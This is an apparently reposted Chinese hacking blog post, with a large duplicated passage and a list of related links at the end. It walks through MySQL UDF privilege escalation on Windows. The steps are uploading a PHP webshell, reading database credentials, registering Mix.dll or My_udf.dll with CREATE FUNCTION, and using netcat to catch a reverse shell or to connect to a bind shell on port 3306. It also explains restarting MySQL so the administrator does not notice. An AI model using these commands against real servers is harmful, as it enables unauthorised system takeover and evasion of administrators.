MYSQL简单提权--Mix.dll My_udf.dll(老东西,做个备份)
2011-12-02 10:20
471 查看
S- serv提权方式人人都会用了,搞得现在的主机都配置得非常安全,看来攻击手法的层出不穷也是造成中国网络安全进步的一大原因之一,还有其他的 pcanywhere获取密码,替换服务,等等。但是现在也没这么好搞了,随着安全意识的提高,之前的方式估计不怎么管用,现在我给大家介绍一下一种新的提权方式,看过古典LM做的那动画的朋友都知道吧?利用MYSQLl弱口令拿到系统权限,在WEBSHEL上也可实现,不过有个前提,就是目标主机装有
MYSQL,而你又知道MYSQL的用户和密码,才可以进行提权。WEBSHELL获得了,找用户和密码也不是什么难事。现在我拿我另外一台机器做示范,已经把PHPSHELL传上去了,一般来说连接mysql的帐户密码很好找,随便编辑一个PHP文件,就看到了。
看到了吧,用户名:root 密码:123456 库名:php 然后怎么办呢?先用SQL Query 建立连接,哈连接成功了,现在开始将我们的提权用滴东东:Mix.dll My_udf.dll上传上去先.OK,传好了,Mix.dll用于反弹连接,My_udf.dll是正向连接,直接用连接对方的3306端口然后输入密码就可获得CMDSHELL。好,不多说了,传上去之后呢就执行以下SQL语句
create function Mixconnect returns string soname 'd:\\php\\php\\Mix.dll';
来注册函数.
出现SQL语句成功执行!
离拿到CMDSHELL已经不远了,我们先用NC在本地监听一个端口先,Nc -l -p 1234 (这个我想不用截图了吧)而后执行语句:
select Mixconnect('192.168.1.520','1234');
来激活那个函数,执行成功,然后看看我们的NC有反映没,成功得到CMSHELL,不过这时对方的MYSQL已经假死咯,我们要把MYSQL服务进程给 kill掉,然后重新启动MYSQL服务才行,不然管理员发现网站运行不了了,那就。。。。如果该服务器不允许连接任何外部IP和端口,而他的3306端口却是对外开的!这时My_udf.dll就该上场了,使用方法和Mix一样,连接MYSQL成功后执行如下语句:
create function my_udfdoor returns string soname 'D:\\php\\php\my_udf.dll';
执行语句成功后,然后我们就开始激活这个函数,输入语句:
select my_udfdoor ('');
然后用nc连接3306端口,然后输入fuck 就可以得到一个cmdshell了.
注意注意::Mysql 5.1版本开始必须把udf.dll文件放到mysql安装目录下的lib/blugin文件下才能创建自定义函数
MYSQL,而你又知道MYSQL的用户和密码,才可以进行提权。WEBSHELL获得了,找用户和密码也不是什么难事。现在我拿我另外一台机器做示范,已经把PHPSHELL传上去了,一般来说连接mysql的帐户密码很好找,随便编辑一个PHP文件,就看到了。
看到了吧,用户名:root 密码:123456 库名:php 然后怎么办呢?先用SQL Query 建立连接,哈连接成功了,现在开始将我们的提权用滴东东:Mix.dll My_udf.dll上传上去先.OK,传好了,Mix.dll用于反弹连接,My_udf.dll是正向连接,直接用连接对方的3306端口然后输入密码就可获得CMDSHELL。好,不多说了,传上去之后呢就执行以下SQL语句
create function Mixconnect returns string soname 'd:\\php\\php\\Mix.dll';
来注册函数.
出现SQL语句成功执行!
离拿到CMDSHELL已经不远了,我们先用NC在本地监听一个端口先,Nc -l -p 1234 (这个我想不用截图了吧)而后执行语句:
select Mixconnect('192.168.1.520','1234');
来激活那个函数,执行成功,然后看看我们的NC有反映没,成功得到CMSHELL,不过这时对方的MYSQL已经假死咯,我们要把MYSQL服务进程给 kill掉,然后重新启动MYSQL服务才行,不然管理员发现网站运行不了了,那就。。。。如果该服务器不允许连接任何外部IP和端口,而他的3306端口却是对外开的!这时My_udf.dll就该上场了,使用方法和Mix一样,连接MYSQL成功后执行如下语句:
create function my_udfdoor returns string soname 'D:\\php\\php\my_udf.dll';
执行语句成功后,然后我们就开始激活这个函数,输入语句:
select my_udfdoor ('');
然后用nc连接3306端口,然后输入fuck 就可以得到一个cmdshell了.
注意注意::Mysql 5.1版本开始必须把udf.dll文件放到mysql安装目录下的lib/blugin文件下才能创建自定义函数
相关文章推荐
- mysql提权提示can't open shared library 'udf.dll'解决办法
- SqlMap之mysql udf.dll 提权
- 利用Mix.dll My_udf.dll提升权限
- php简单备份与还原MySql的方法
- 史上最简单的 MySQL 教程(三十七)「数据备份与还原(下)」
- mysql 的简单备份
- 简单3步完成mysql自动备份
- 简单的mysql备份脚本
- 简单点,搬砖的方式简单点,hive mysql 导入数据的UDF,分享给小伙伴们
- [zz]MySQL提权简单方法
- Windows下简单的Mysql备份BAT脚本分享
- linux 简单的mysql备份和导入,以及文件的备份和导入
- mysql备份工具 :mysqldump mydumper Xtrabackup 原理
- 使用MySQL-zrm对Mysql简单配置以备份&&恢复操作步骤
- MySql逻辑备份恢复方法简单总结
- Windows 下 MySQL 简单定时自动备份、删除过期备份
- MySQL扩展接口UDF提权
- 关于简单的mysql备份
- linux 简单的mysql备份和导入,以及文件的备份和导入
- 一个简单的MySQL备份Shell脚本